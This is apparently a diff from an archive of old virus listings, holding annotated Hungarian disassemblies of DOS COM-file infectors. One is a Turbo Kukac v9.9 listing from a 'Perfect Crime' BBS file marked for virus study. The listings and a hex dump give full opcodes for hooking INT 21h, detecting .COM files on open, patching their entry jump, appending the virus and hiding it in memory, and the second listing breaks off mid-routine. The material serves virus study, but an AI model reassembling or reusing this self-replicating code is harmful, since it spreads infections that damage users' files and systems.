0EB0:0133 A10200 MOV AX,[0002] ;PSP-ben a RAM tetej‚nek
|
||||
;paragrafusc¡me
|
||||
0EB0:0136 2D0008 SUB AX,0800
|
||||
0EB0:0139 8EC0 MOV ES,AX ;virus £j szegmens
|
||||
0EB0:013B BF0001 MOV DI,0100
|
||||
0EB0:013E 83EE03 SUB SI,+03 ;JMP+op. hossza
|
||||
0EB0:0141 B90002 MOV CX,0200 ;virus m‚rete
|
||||
0EB0:0144 F3 REPZ
|
||||
0EB0:0145 A4 MOVSB ;virus m sol sa az
|
||||
;£j szegmensbe
|
||||
0EB0:0146 8C06F200 MOV [00F2],ES ;£j szegmensc¡m
|
||||
0EB0:014A B95501 MOV CX,0155 ;£j szegmensben a be-
|
||||
;l‚p‚si offset-je
|
||||
0EB0:014D 890EF000 MOV [00F0],CX
|
||||
0EB0:0151 FF2EF000 JMP FAR [00F0] ;ugr s az £j seg.:0155
|
||||
|
||||
;bel‚p‚si pont
|
||||
0EB0:0155 8CC1 MOV CX,ES
|
||||
0EB0:0157 8CD8 MOV AX,DS
|
||||
0EB0:0159 26 ES:
|
||||
0EB0:015A A38C02 MOV [028C],AX ;r‚gi seg (eredeti
|
||||
;program‚)
|
||||
0EB0:015D B80001 MOV AX,0100
|
||||
0EB0:0160 26 ES:
|
||||
0EB0:0161 A38A02 MOV [028A],AX ;0100h offset
|
||||
0EB0:0164 8CC0 MOV AX,ES
|
||||
0EB0:0166 8ED8 MOV DS,AX ;DS=£j seg
|
||||
0EB0:0168 B82135 MOV AX,3521
|
||||
0EB0:016B CD21 INT 21 ;INT 21h lek‚rdez‚se
|
||||
0EB0:016D 2E CS:
|
||||
0EB0:016E 891E7C02 MOV [027C],BX ;INT 21h offset
|
||||
0EB0:0172 8CC3 MOV BX,ES
|
||||
0EB0:0174 2E CS:
|
||||
0EB0:0175 891E7E02 MOV [027E],BX ;INT 21h segment
|
||||
0EB0:0179 B8A501 MOV AX,01A5 ;£j INT 21h offset
|
||||
0EB0:017C 8BD0 MOV DX,AX
|
||||
0EB0:017E 8BC1 MOV AX,CX
|
||||
0EB0:0180 8ED8 MOV DS,AX
|
||||
0EB0:0182 B82125 MOV AX,2521
|
||||
0EB0:0185 CD21 INT 21 ;INT 21h ellop sa
|
||||
0EB0:0187 8B168602 MOV DX,[0286] ;JMP+op.
|
||||
0EB0:018B 8B0E8802 MOV CX,[0288] ;operandus
|
||||
0EB0:018F A18C02 MOV AX,[028C] ;eredeti prg.seg.
|
||||
0EB0:0192 8ED8 MOV DS,AX
|
||||
0EB0:0194 89160001 MOV [0100],DX ;eredeti JMP+op.
|
||||
0EB0:0198 890E0201 MOV [0102],CX ;visszarak sa
|
||||
0EB0:019C 8EC0 MOV ES,AX
|
||||
0EB0:019E 59 POP CX
|
||||
0EB0:019F 58 POP AX
|
||||
0EB0:01A0 2E CS:
|
||||
0EB0:01A1 FF2E8A02 JMP FAR [028A] ;ugr s az eredeti
|
||||
;programra
|
||||
|
||||
;£j INT 21h rutin
|
||||
0EB0:01A5 90 NOP
|
||||
0EB0:01A6 80FC3D CMP AH,3D ;file nyit s ?
|
||||
0EB0:01A9 7403 JZ 01AE ;igen
|
||||
0EB0:01AB E9C000 JMP 026E ;ugr s az eredeti
|
||||
;INT 21h-ra
|
||||
0EB0:01AE 1E PUSH DS
|
||||
0EB0:01AF 06 PUSH ES
|
||||
0EB0:01B0 50 PUSH AX
|
||||
0EB0:01B1 53 PUSH BX
|
||||
0EB0:01B2 51 PUSH CX
|
||||
0EB0:01B3 52 PUSH DX
|
||||
0EB0:01B4 57 PUSH DI
|
||||
0EB0:01B5 56 PUSH SI
|
||||
|
||||
;Ellen”rzi hogy COM file-e
|
||||
|
||||
0EB0:01B6 8BFA MOV DI,DX ;Filespec.
|
||||
0EB0:01B8 8CDE MOV SI,DS
|
||||
0EB0:01BA 8EC6 MOV ES,SI
|
||||
0EB0:01BC B000 MOV AL,00
|
||||
0EB0:01BE B93200 MOV CX,0032
|
||||
0EB0:01C1 FC CLD
|
||||
0EB0:01C2 F2 REPNZ
|
||||
0EB0:01C3 AE SCASB ;PATH lem sol sa
|
||||
0EB0:01C4 83EF03 SUB DI,+03
|
||||
0EB0:01C7 B84F4D MOV AX,4D4F ;'OM' AX-ba
|
||||
0EB0:01CA 26 ES:
|
||||
0EB0:01CB 3B05 CMP AX,[DI] ;'OM' ?
|
||||
0EB0:01CD 7403 JZ 01D2 ;igen
|
||||
0EB0:01CF E99400 JMP 0266 ;eredeti INT 21h-ra
|
||||
0EB0:01D2 B82E43 MOV AX,432E ;'.C' AX-be
|
||||
0EB0:01D5 26 ES:
|
||||
0EB0:01D6 3B45FE CMP AX,[DI-02] ;'.C' ?
|
||||
0EB0:01D9 7403 JZ 01DE ;biztos hogy COM file!
|
||||
0EB0:01DB E98800 JMP 0266 ;eredeti INT 21h-ra
|
||||
0EB0:01DE B43D MOV AH,3D ;file nyit sa
|
||||
0EB0:01E0 B002 MOV AL,02 ;¡r s/olvas s
|
||||
0EB0:01E2 E89000 CALL 0275 ;INT 21h hiv sa
|
||||
0EB0:01E5 7303 JNB 01EA ;ha nincs hiba
|
||||
0EB0:01E7 EB7D JMP 0266 ;eredeti INT 21h-ra
|
||||
|
||||
;File m‚ret ellen”rz‚s
|
||||
|
||||
0EB0:01E9 90 NOP
|
||||
0EB0:01EA 8BD8 MOV BX,AX ;kezel”
|
||||
0EB0:01EC B90000 MOV CX,0000
|
||||
0EB0:01EF BA0000 MOV DX,0000
|
||||
0EB0:01F2 B80242 MOV AX,4202 ;file v‚g‚re poz.
|
||||
0EB0:01F5 E87D00 CALL 0275 ;INT 21h hiv sa
|
||||
0EB0:01F8 3D00FE CMP AX,FE00
|
||||
0EB0:01FB 7369 JNB 0266 ;nagyobb INT 21h-ra
|
||||
|
||||
;Eredeti 4 byte beolvas sa (JMP+operandusa)
|
||||
|
||||
0EB0:01FD 2D0300 SUB AX,0003 ;JMP+op. hossza
|
||||
0EB0:0200 2E CS:
|
||||
0EB0:0201 A38102 MOV [0281],AX
|
||||
0EB0:0204 B80042 MOV AX,4200 ;file elej‚re poz.
|
||||
0EB0:0207 B90000 MOV CX,0000
|
||||
0EB0:020A BA0000 MOV DX,0000
|
||||
0EB0:020D E86500 CALL 0275 ;INT 21h hiv sa
|
||||
0EB0:0210 B43F MOV AH,3F ;olvas s
|
||||
0EB0:0212 B90400 MOV CX,0004 ;4 byte
|
||||
0EB0:0215 BA8602 MOV DX,0286 ;ide olvassa
|
||||
0EB0:0218 8CCF MOV DI,CS
|
||||
0EB0:021A 8EDF MOV DS,DI ;DS=CS
|
||||
0EB0:021C E85600 CALL 0275 ;INT 21h hiv sa
|
||||
0EB0:021F B005 MOV AL,05
|
||||
0EB0:0221 3A068902 CMP AL,[0289]
|
||||
0EB0:0225 743F JZ 0266
|
||||
|
||||
;Virusra mutat¢ JMP+op be¡r sa a programba
|
||||
|
||||
0EB0:0227 B80042 MOV AX,4200 ;file elej‚re poz.
|
||||
0EB0:022A B90000 MOV CX,0000
|
||||
0EB0:022D 8BD1 MOV DX,CX
|
||||
0EB0:022F E84300 CALL 0275 ;INT 21h hiv sa
|
||||
0EB0:0232 B0E9 MOV AL,E9 ;JMP k¢dja
|
||||
0EB0:0234 2E CS:
|
||||
0EB0:0235 A28002 MOV [0280],AL ;leteszi
|
||||
0EB0:0238 B005 MOV AL,05
|
||||
0EB0:023A 2E CS:
|
||||
0EB0:023B A28302 MOV [0283],AL
|
||||
0EB0:023E B90400 MOV CX,0004 ;4 byte
|
||||
0EB0:0241 BA8002 MOV DX,0280 ;JMP+op. kezdete
|
||||
0EB0:0244 0E PUSH CS
|
||||
0EB0:0245 1F POP DS
|
||||
0EB0:0246 B440 MOV AH,40 ;ki¡r s
|
||||
0EB0:0248 E82A00 CALL 0275 ;INT 21h hiv sa
|
||||
|
||||
;1C0h byte ki¡r sa FERT™Z<E284A2>S!
|
||||
|
||||
0EB0:024B B80242 MOV AX,4202 ;file v‚g‚re poz.
|
||||
0EB0:024E B90000 MOV CX,0000
|
||||
0EB0:0251 8BD1 MOV DX,CX
|
||||
0EB0:0253 E81F00 CALL 0275 ;INT 21h hiv sa
|
||||
0EB0:0256 BA0001 MOV DX,0100 ;0100h -t¢l
|
||||
0EB0:0259 B9C001 MOV CX,01C0 ;01c0h byte
|
||||
0EB0:025C B440 MOV AH,40 ;ki¡r sa
|
||||
0EB0:025E E81400 CALL 0275 ;INT 21h hiv sa
|
||||
|
||||
;Ffert”z”tt file z r sa
|
||||
|
||||
0EB0:0261 B43E MOV AH,3E
|
||||
0EB0:0263 E80F00 CALL 0275 ;INT 21h hiv sa
|
||||
0EB0:0266 5E POP SI
|
||||
0EB0:0267 5F POP DI
|
||||
0EB0:0268 5A POP DX
|
||||
0EB0:0269 59 POP CX
|
||||
0EB0:026A 5B POP BX
|
||||
0EB0:026B 58 POP AX
|
||||
0EB0:026C 07 POP ES
|
||||
0EB0:026D 1F POP DS
|
||||
0EB0:026E 90 NOP
|
||||
0EB0:026F 2E CS:
|
||||
0EB0:0270 FF2E7C02 JMP FAR [027C] ;ugr s az eredeti
|
||||
;INT 21h-ra
|
||||
0EB0:0274 CF IRET
|
||||
|
||||
;Eredeti INT 21h hiv sa
|
||||
0EB0:0275 9C PUSHF ;IRET miatt!
|
||||
0EB0:0276 2E CS:
|
||||
0EB0:0277 FF1E7C02 CALL FAR [027C] ;INT 21h hiv sa
|
||||
0EB0:027B C3 RET
|
||||
|
||||
0EB0:027C 16 PUSH SS
|
||||
0EB0:027D 130C ADC CX,[SI]
|
||||
0EB0:027F 02E9 ADD CH,CL
|
||||
0EB0:0281 1C00 SBB AL,00
|
||||
0EB0:0283 050101 ADD AX,0101
|
||||
0EB0:0286 EB12 JMP 029A
|
||||
0EB0:0288 90 NOP
|
||||
0EB0:0289 49 DEC CX
|
||||
0EB0:028A 0001 ADD [BX+DI],AL
|
||||
0EB0:028C DD0A ESC 29,[BP+SI][BP+SI]
|
||||
0EB0:028E 0A0D OR CL,[DI]
|
||||
0EB0:0290 9A6476206D CALL 6D20:7664
|
||||
0EB0:0295 69 DB 69
|
||||
0EB0:0296 6E DB 6E
|
||||
0EB0:0297 64 DB 64
|
||||
0EB0:0298 65 DB 65
|
||||
0EB0:0299 6E DB 6E
|
||||
0EB0:029A 206E61 AND [BP+61],CH
|
||||
0EB0:029D 67 DB 67
|
||||
0EB0:029E 7974 JNS 0314
|
||||
0EB0:02A0 7564 JNZ 0306
|
||||
0EB0:02A2 A073A3 MOV AL,[A373]
|
||||
0EB0:02A5 6E DB 6E
|
||||
0EB0:02A6 61 DB 61
|
||||
0EB0:02A7 6B DB 6B
|
||||
0EB0:02A8 2120 AND [BX+SI],SP
|
||||
0EB0:02AA 54 PUSH SP
|
||||
0EB0:02AB 7572 JNZ 031F
|
||||
0EB0:02AD 62 DB 62
|
||||
0EB0:02AE 6F DB 6F
|
||||
0EB0:02AF 204020 AND [BX+SI+20],AL
|
||||
0EB0:02B2 2E CS:
|
||||
0EB0:02B3 2E CS:
|
||||
0EB0:02B4 2E CS:
|
||||
0EB0:02B5 202E2E2E AND [2E2E],CH
|
||||
0EB0:02B9 201A AND [BP+SI],BL
|
||||
0EB0:02BB 0000 ADD [BX+SI],AL
|
||||
0EB0:02BD 0000 ADD [BX+SI],AL
|
||||
0EB0:02BF 005374 ADD [BP+DI+74],DL
|
||||
0EB0:02C2 20E8 AND AL,CH
|
||||
0EB0:02C4 4E DEC SI
|
||||
0EB0:02C5 01E9 ADD CX,BP
|
||||
0EB0:02C7 51 PUSH CX
|
||||
0EB0:02C8 FF2EC606 JMP FAR [06C6]
|
||||
0EB0:02CC 050006 ADD AX,0600
|
||||
0EB0:02CF 2E CS:
|
||||
0EB0:02D0 C70609001000 MOV WORD PTR [0009],0010
|
||||
0EB0:02D6 EB7B JMP 0353
|
||||
0EB0:02D8 90 NOP
|
||||
0EB0:02D9 2E CS:
|
||||
0EB0:02DA C70609000A00 MOV WORD PTR [0009],000A
|
||||
0EB0:02E0 EB71 JMP 0353
|
||||
0EB0:02E2 90 NOP
|
||||
0EB0:02E3 2E CS:
|
||||
0EB0:02E4 FE060600 INC BYTE PTR [0006]
|
||||
0EB0:02E8 56 PUSH SI
|
||||
0EB0:02E9 8BF3 MOV SI,BX
|
||||
0EB0:02EB 83C302 ADD BX,+02
|
||||
0EB0:02EE 3E DS:
|
||||
0EB0:02EF 8B7202 MOV SI,[BP+SI+02]
|
||||
0EB0:02F2 2E CS:
|
||||
0EB0:02F3 803E060000 CMP BYTE PTR [0006],00
|
||||
0EB0:02F8 750A JNZ 0304
|
||||
0EB0:02FA AC LODSB
|
||||
0EB0:02FB 3C00 CMP AL,00
|
||||
0EB0:02FD 743B JZ 033A
|
||||
0EB0:02FF E80F03 CALL 0611
|
||||
|
||||
|
||||
Megjegyz‚s:
|
||||
|
||||
Nincs k ros hat sa. Megold sa kit<EFBFBD>n”, hiszen m‚g egy system
|
||||
info lek‚r‚se eset‚n sem kkisebb a DOS lltal l tott mem¢-
|
||||
ria m‚ret, mint a fizikai RAM m‚ret!
|
||||
|
||||
DUMP
|
||||
|
||||
0EB0:0100 E8 00 00 90 5E 50 51 B8-21 35 CD 21 8C C0 3D 00 ....^PQ.!5.!..=.
|
||||
0EB0:0110 40 72 20 83 EE 03 BA 86-01 03 F2 8B 1C 8B 4C 02 @r ...........L.
|
||||
0EB0:0120 89 1E 00 01 89 0E 02 01-8C D8 8E C0 59 58 BB 00 ............YX..
|
||||
0EB0:0130 01 FF E3 A1 02 00 2D 00-08 8E C0 BF 00 01 83 EE ......-.........
|
||||
0EB0:0140 03 B9 00 02 F3 A4 8C 06-F2 00 B9 55 01 89 0E F0 ...........U....
|
||||
0EB0:0150 00 FF 2E F0 00 8C C1 8C-D8 26 A3 8C 02 B8 00 01 .........&......
|
||||
0EB0:0160 26 A3 8A 02 8C C0 8E D8-B8 21 35 CD 21 2E 89 1E &........!5.!...
|
||||
0EB0:0170 7C 02 8C C3 2E 89 1E 7E-02 B8 A5 01 8B D0 8B C1 |......~........
|
||||
0EB0:0180 8E D8 B8 21 25 CD 21 8B-16 86 02 8B 0E 88 02 A1 ...!%.!.........
|
||||
0EB0:0190 8C 02 8E D8 89 16 00 01-89 0E 02 01 8E C0 59 58 ..............YX
|
||||
0EB0:01A0 2E FF 2E 8A 02 90 80 FC-3D 74 03 E9 C0 00 1E 06 ........=t......
|
||||
0EB0:01B0 50 53 51 52 57 56 8B FA-8C DE 8E C6 B0 00 B9 32 PSQRWV.........2
|
||||
0EB0:01C0 00 FC F2 AE 83 EF 03 B8-4F 4D 26 3B 05 74 03 E9 ........OM&;.t..
|
||||
0EB0:01D0 94 00 B8 2E 43 26 3B 45-FE 74 03 E9 88 00 B4 3D ....C&;E.t.....=
|
||||
0EB0:01E0 B0 02 E8 90 00 73 03 EB-7D 90 8B D8 B9 00 00 BA .....s..}.......
|
||||
0EB0:01F0 00 00 B8 02 42 E8 7D 00-3D 00 FE 73 69 2D 03 00 ....B.}.=..si-..
|
||||
0EB0:0200 2E A3 81 02 B8 00 42 B9-00 00 BA 00 00 E8 65 00 ......B.......e.
|
||||
0EB0:0210 B4 3F B9 04 00 BA 86 02-8C CF 8E DF E8 56 00 B0 .?...........V..
|
||||
0EB0:0220 05 3A 06 89 02 74 3F B8-00 42 B9 00 00 8B D1 E8 .:...t?..B......
|
||||
0EB0:0230 43 00 B0 E9 2E A2 80 02-B0 05 2E A2 83 02 B9 04 C...............
|
||||
0EB0:0240 00 BA 80 02 0E 1F B4 40-E8 2A 00 B8 02 42 B9 00 .......@.*...B..
|
||||
0EB0:0250 00 8B D1 E8 1F 00 BA 00-01 B9 C0 01 B4 40 E8 14 .............@..
|
||||
0EB0:0260 00 B4 3E E8 0F 00 5E 5F-5A 59 5B 58 07 1F 90 2E ..>...^_ZY[X....
|
||||
0EB0:0270 FF 2E 7C 02 CF 9C 2E FF-1E 7C 02 C3 16 13 0C 02 ..|......|......
|
||||
0EB0:0280 E9 1C 00 05 01 01 EB 12-90 49 00 01 DD 0A 0A 0D .........I......
|
||||
0EB0:0290 9A 64 76 20 6D 69 6E 64-65 6E 20 6E 61 67 79 74 .dv minden nagyt
|
||||
0EB0:02A0 75 64 A0 73 A3 6E 61 6B-21 20 54 75 72 62 6F 20 ud.s.nak! Turbo
|
||||
0EB0:02B0 40 20 2E 2E 2E 20 2E 2E-2E 20 1A 00 00 00 00 00 @ ... ... ......
|
||||
0EB0:02C0 53 74 20 E8 4E 01 E9 51-FF 2E C6 06 05 00 06 2E St .N..Q........
|
||||
0EB0:02D0 C7 06 09 00 10 00 EB 7B-90 2E C7 06 09 00 0A 00 .......{........
|
||||
0EB0:02E0 EB 71 90 2E FE 06 06 00-56 8B F3 83 C3 02 3E 8B .q......V.....>.
|
||||
0EB0:02F0 72 02 2E 80 3E 06 00 00-75 0A AC 3C 00 74 3B E8 r...>...u..<.t;.
|
||||
0EB0:0300 0F .
|
||||
|
|
@ -0,0 +1,426 @@
|
|||
;****************************************************************************;
|
||||
; ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] For All Your H/P/A/V Files [=- ;
|
||||
; -=] SysOp: Peter Venkman [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; ;
|
||||
; *** NOT FOR GENERAL DISTRIBUTION *** ;
|
||||
; ;
|
||||
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
|
||||
; Around Among the General Public. It Will be Very Useful for Learning how ;
|
||||
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
|
||||
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
|
||||
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
|
||||
; Is. Keep This Code in Responsible Hands! ;
|
||||
; ;
|
||||
;****************************************************************************;
|
||||
TURBO KUKAC v9.9 virus unassembled list:
|
||||
`90.07.21.
|
||||
|
||||
Magyar zat: K”v ri L szl˘
|
||||
Tel.: (41) 21-822 07-13:20 mh.
|
||||
21-033 18:00-
|
||||
|
||||
|
||||
|
||||
28F8:0100 E80000 CALL 0103 ;IP ‚rt‚ke az SI-be
|
||||
28F8:0103 90 NOP ;ez lesz a b zis offset
|
||||
28F8:0104 5E POP SI
|
||||
28F8:0105 50 PUSH AX
|
||||
28F8:0106 51 PUSH CX
|
||||
28F8:0107 B021 MOV AL,21
|
||||
28F8:0109 B435 MOV AH,35
|
||||
28F8:010B CD21 INT 21 ;INT 21h cˇm‚nek lek‚r-
|
||||
;dez‚se
|
||||
28F8:010D 8CC0 MOV AX,ES
|
||||
28F8:010F 3D0040 CMP AX,4000 ;a mem˘ri ban van ?
|
||||
28F8:0112 7224 JB 0138 ;nincs!
|
||||
28F8:0114 83EE03 SUB SI,+03 ;b zis offset -3
|
||||
;(3 byte hosszu a JMP
|
||||
;+ az operandusa!)
|
||||
28F8:0117 BAC102 MOV DX,02C1
|
||||
28F8:011A 81EA0001 SUB DX,0100 ;0100h offset levon sa
|
||||
;(COM file saj toss ga!)
|
||||
28F8:011E 03F2 ADD SI,DX
|
||||
28F8:0120 8B1C MOV BX,[SI] ;JMP k˘dja + az operan-
|
||||
;dus fele
|
||||
28F8:0122 8B4C02 MOV CX,[SI+02] ;JMP operandusa + 1 byte
|
||||
28F8:0125 891E0001 MOV [0100],BX ;eredeti prg kezdet
|
||||
28F8:0129 890E0201 MOV [0102],CX ;let rol sa
|
||||
28F8:012D 8CD8 MOV AX,DS
|
||||
28F8:012F 8EC0 MOV ES,AX ;ES=DS
|
||||
28F8:0131 59 POP CX
|
||||
28F8:0132 58 POP AX
|
||||
28F8:0133 BB0001 MOV BX,0100 ;ugr s offset-je
|
||||
28F8:0136 FFE3 JMP BX ;EREDETI PROGRAM V<>GRE-
|
||||
;HAJTŹSA
|
||||
|
||||
;HA M<>G NINCS A MEM˘RIŹBAN
|
||||
28F8:0138 8CD8 MOV AX,DS ;saj t szegmense
|
||||
28F8:013A 48 DEC AX ;saj t seg-1= MCB. seg.
|
||||
28F8:013B 8ED8 MOV DS,AX ;DS=MCB. szegmense
|
||||
28F8:013D A10300 MOV AX,[0003] ;DOS lltal a programnak
|
||||
;foglalt mem˘riablokk
|
||||
;hossza
|
||||
28F8:0140 2D4100 SUB AX,0041 ;virus hossz t levonja
|
||||
;bel”le (41*16 byte)
|
||||
28F8:0143 A30300 MOV [0003],AX ;visszateszi igy a DOS
|
||||
; lltal l tott teljes
|
||||
;mem˘ria nagys ga a prg.
|
||||
;kil‚p‚se ut n (41*16
|
||||
;byte-tal) kevesebb lesz
|
||||
;Hasonl˘an csin lja ezt
|
||||
;a YANKEE DOODLE is, s
|
||||
;ezzel azt ‚ri el, hogy
|
||||
;semmilyen
|
||||
;System Storage Map
|
||||
;programmal nem mutat-
|
||||
;hat˘ ki a virus jele-
|
||||
;l‚te a mem˘ri ban!
|
||||
;A PCTOOLS system info
|
||||
;kimutatja, azaz csak
|
||||
;annyit l tni, hogy a
|
||||
;fizikai RAM m‚ret 640K
|
||||
;s a DOS lltal l tott
|
||||
;az 639k byte! Igy k”-
|
||||
;vetkeztetni lehet...
|
||||
28F8:0146 8CC8 MOV AX,CS
|
||||
28F8:0148 8ED8 MOV DS,AX ;DS=CS
|
||||
28F8:014A A10200 MOV AX,[0002] ;PSP-ben a RAM tetej‚-
|
||||
;nek a paragrafuscˇme
|
||||
28F8:014D 2D0008 SUB AX,0800
|
||||
28F8:0150 8EC0 MOV ES,AX ;virus Łj szegmense
|
||||
28F8:0152 BF0001 MOV DI,0100
|
||||
28F8:0155 83EE03 SUB SI,+03
|
||||
28F8:0158 B90002 MOV CX,0200 ;virus hossza
|
||||
28F8:015B F3 REPZ
|
||||
28F8:015C A4 MOVSB ;virus m sol sa az Łj
|
||||
;szegmensbe
|
||||
28F8:015D 8C06C702 MOV [02C7],ES ;Łj szegmens t rol sa
|
||||
28F8:0161 B96C01 MOV CX,016C ;bel‚p‚si pont
|
||||
28F8:0164 890EC502 MOV [02C5],CX ;t rol sa
|
||||
28F8:0168 FF2EC502 JMP FAR [02C5] ;ugr s az Łj szegmens
|
||||
;01c6 offset-‚re
|
||||
;UJ SZEGMENSBEN A BEL<45>P<EFBFBD>SI PONT
|
||||
28F8:016C 8CC1 MOV CX,ES
|
||||
28F8:016E 8CD8 MOV AX,DS ;ahonnan m solta mag t
|
||||
28F8:0170 26 ES:
|
||||
28F8:0171 A3CB02 MOV [02CB],AX ;R<>GI PRG. segment cˇm
|
||||
28F8:0174 B80001 MOV AX,0100
|
||||
28F8:0177 26 ES:
|
||||
28F8:0178 A3C902 MOV [02C9],AX ;0100h offset t rol sa
|
||||
28F8:017B 8CC0 MOV AX,ES
|
||||
28F8:017D 8ED8 MOV DS,AX
|
||||
28F8:017F BAC701 MOV DX,01C7 ;INT 05 - HARD COPY Łj
|
||||
;offset-je
|
||||
28F8:0182 B005 MOV AL,05
|
||||
28F8:0184 B425 MOV AH,25
|
||||
28F8:0186 CD21 INT 21 ;INT 05 ellop sa
|
||||
28F8:0188 B435 MOV AH,35
|
||||
28F8:018A B021 MOV AL,21
|
||||
28F8:018C CD21 INT 21 ;INT 21h cˇm lek‚rdez‚-
|
||||
;se
|
||||
28F8:018E 2E CS:
|
||||
28F8:018F 891EB702 MOV [02B7],BX ;INT 05h offset (r‚gi)
|
||||
28F8:0193 8CC3 MOV BX,ES
|
||||
28F8:0195 2E CS:
|
||||
28F8:0196 891EB902 MOV [02B9],BX ;INT 05h segment (r‚gi)
|
||||
28F8:019A B8D901 MOV AX,01D9 ;Łj INT 21h offset cˇm
|
||||
28F8:019D 8BD0 MOV DX,AX
|
||||
28F8:019F 8BC1 MOV AX,CX
|
||||
28F8:01A1 8ED8 MOV DS,AX
|
||||
28F8:01A3 B021 MOV AL,21
|
||||
28F8:01A5 B425 MOV AH,25
|
||||
28F8:01A7 CD21 INT 21 ;INT 21h ellop sa
|
||||
28F8:01A9 8B16C102 MOV DX,[02C1] ;EREDETI JMP + AZ
|
||||
28F8:01AD 8B0EC302 MOV CX,[02C3] ;OPERANDUSA!!!
|
||||
28F8:01B1 A1CB02 MOV AX,[02CB] ;EREDETI PRG. SEG!!!
|
||||
28F8:01B4 8ED8 MOV DS,AX
|
||||
28F8:01B6 89160001 MOV [0100],DX ;eredeti JMP k˘dja
|
||||
28F8:01BA 890E0201 MOV [0102],CX ;‚s operandusa
|
||||
28F8:01BE 8EC0 MOV ES,AX
|
||||
28F8:01C0 59 POP CX
|
||||
28F8:01C1 58 POP AX
|
||||
28F8:01C2 2E CS:
|
||||
28F8:01C3 FF2EC902 JMP FAR [02C9] ;EREDETI PROGRAM FUTTA-
|
||||
;TŹSA!
|
||||
;Łj INT 05 - HARD COPY rutin
|
||||
28F8:01C7 90 NOP
|
||||
28F8:01C8 50 PUSH AX
|
||||
28F8:01C9 1E PUSH DS
|
||||
28F8:01CA 52 PUSH DX
|
||||
28F8:01CB 8CC8 MOV AX,CS
|
||||
28F8:01CD 8ED8 MOV DS,AX
|
||||
;V<>GTELEN CIKLUS!
|
||||
28F8:01CF BACE02 MOV DX,02CE ;sz”veg kezdete
|
||||
;Turbo Kukac v9.9
|
||||
28F8:01D2 B409 MOV AH,09 ;print string
|
||||
28F8:01D4 E8D900 CALL 02B0 ;r‚gi INT 21h hiv sa
|
||||
28F8:01D7 EBF6 JMP 01CF ;Łjra!
|
||||
|
||||
;Łj INT 21h rutin
|
||||
28F8:01D9 90 NOP
|
||||
28F8:01DA 80FC3D CMP AH,3D ;file nyit sa alfunkci˘?
|
||||
28F8:01DD 7403 JZ 01E2 ;igen
|
||||
28F8:01DF E9C700 JMP 02A9 ;nem ugr sa az eredeti
|
||||
;INT 21h-ra
|
||||
28F8:01E2 90 NOP
|
||||
28F8:01E3 1E PUSH DS
|
||||
28F8:01E4 06 PUSH ES
|
||||
28F8:01E5 50 PUSH AX
|
||||
28F8:01E6 53 PUSH BX
|
||||
28F8:01E7 51 PUSH CX
|
||||
28F8:01E8 52 PUSH DX
|
||||
28F8:01E9 57 PUSH DI
|
||||
28F8:01EA 56 PUSH SI
|
||||
|
||||
;File kiterjeszt‚s ellen”rz‚se
|
||||
|
||||
28F8:01EB 8BFA MOV DI,DX ;file PATH kezdete
|
||||
28F8:01ED 8CDE MOV SI,DS
|
||||
28F8:01EF 8EC6 MOV ES,SI ;ES=DS (igy a file PATH
|
||||
; tv‚tele!)
|
||||
28F8:01F1 B000 MOV AL,00 ;PATH lez r˘ nulla
|
||||
28F8:01F3 B93200 MOV CX,0032 ;file secifik ci˘ hossza
|
||||
28F8:01F6 FC CLD ;el”re
|
||||
28F8:01F7 F2 REPNZ
|
||||
28F8:01F8 AE SCASB ;PATH lez r˘ 0 byte ke-
|
||||
;res‚se
|
||||
28F8:01F9 83EF03 SUB DI,+03 ;-3 igy a kiterjeszt‚s
|
||||
;kezdet+1 pozici˘ra mu-
|
||||
;tat
|
||||
28F8:01FC B84F4D MOV AX,4D4F ;'OM' AX-be
|
||||
28F8:01FF 26 ES:
|
||||
28F8:0200 3B05 CMP AX,[DI] ; 'OM' a v‚ge ?
|
||||
28F8:0202 7403 JZ 0207 ;igen val szin<69>leg COM
|
||||
;file
|
||||
28F8:0204 E99A00 JMP 02A1 ;nem COM ugr s az erede-
|
||||
;ti INT 21h-ra
|
||||
28F8:0207 B82E43 MOV AX,432E ;'.C' AX-be
|
||||
28F8:020A 26 ES:
|
||||
28F8:020B 3B45FE CMP AX,[DI-02] ; '.C' ?
|
||||
28F8:020E 7403 JZ 0213 ;biztos hogy COM file!
|
||||
28F8:0210 E98E00 JMP 02A1 ;nem COM ugr s az erede-
|
||||
;ti INT 21h-ra
|
||||
;File nyit sa
|
||||
|
||||
28F8:0213 B43D MOV AH,3D ;file nyit s
|
||||
28F8:0215 B002 MOV AL,02 ;ˇr s/olvas s
|
||||
28F8:0217 E89600 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:021A 7303 JNB 021F ;ha nincs hiba
|
||||
28F8:021C E98200 JMP 02A1 ;hiba eset‚n ugr s az
|
||||
;eredeti INT 21h-ra
|
||||
28F8:021F 8BD8 MOV BX,AX ;file kezel”
|
||||
|
||||
;File m‚ret ellen”rz‚s
|
||||
|
||||
28F8:0221 B90000 MOV CX,0000
|
||||
28F8:0224 BA0000 MOV DX,0000
|
||||
28F8:0227 B002 MOV AL,02 ;file v‚g‚re
|
||||
28F8:0229 B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:022B E88200 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:022E 3D00FE CMP AX,FE00
|
||||
28F8:0231 736E JNB 02A1 ;ha nem nagyobb a file
|
||||
;65024 byte-n l
|
||||
28F8:0233 2D0300 SUB AX,0003 ;JMP+op hossza
|
||||
|
||||
;Fert”zend” file eredeti 4 byte j nak
|
||||
;beolvas sa
|
||||
|
||||
28F8:0236 2E CS:
|
||||
28F8:0237 A3BE02 MOV [02BE],AX ;let rolja
|
||||
28F8:023A B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:023C B000 MOV AL,00 ;file elej‚re
|
||||
28F8:023E B90000 MOV CX,0000
|
||||
28F8:0241 BA0000 MOV DX,0000
|
||||
28F8:0244 E86900 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:0247 B43F MOV AH,3F ;olvas s file-b˘l
|
||||
